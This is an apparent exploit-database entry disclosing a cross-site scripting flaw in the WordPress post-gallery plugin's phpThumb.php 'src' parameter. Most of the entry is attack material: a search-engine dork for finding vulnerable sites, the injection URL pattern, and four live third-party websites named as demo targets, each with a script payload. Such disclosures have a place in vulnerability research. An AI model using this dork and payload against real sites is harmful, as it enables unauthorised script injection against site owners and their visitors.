WordPress Post-Gallery Cross Site Scripting

2013-08-26T00:00:00
ID PACKETSTORM:122957
Type packetstorm
Reporter IeDb
Modified 2013-08-26T00:00:00

Description

                                        
                                            `The Wordpress post-gallery Plugin suffers from a Cross-Site Scripting vulnerability.  
  
#################################  
  
# Iranian Exploit DataBase Forum  
  
# http://iedb.ir/acc  
  
# http://iedb.ir  
  
#################################  
  
# Exploit Title : Wordpress post-gallery Plugin Xss vulnerabilities  
  
# Author : Iranian Exploit DataBase  
  
# Discovered By : IeDb  
  
# Email : IeDb.Team@Gmail.com  
  
# Home : http://iedb.ir - http://iedb.ir/acc  
  
# Software Link : http://wordpress.org/  
  
# Security Risk : High  
  
# Tested on : Linux  
  
# Dork : inurl:/post-gallery/thirdparty/phpthumb/  
  
#################################  
  
# Exploit :  
  
# http://site.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=[Xss]  
  
# Dem0 :  
  
http://www.knappenforeningen.no/wp/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>  
http://monsterbike.eu/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>  
http://www.yerevanmagazine.com/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>  
http://www.bambusudsalg.dk/wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src="><script>alert(/IeDb.Ir/)</script>  
  
#################################  
  
# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - FαяiD - Medrik - Achraf - Dj.TiniVini  
  
# B3hz4d - C0dex - Beni_Vanda & All Member In Iedb.ir/acc & Iranian Hackers  
  
#################################  
  
# Exploit Archive = http://www.iedb.ir/exploits-411.html  
  
#################################  
`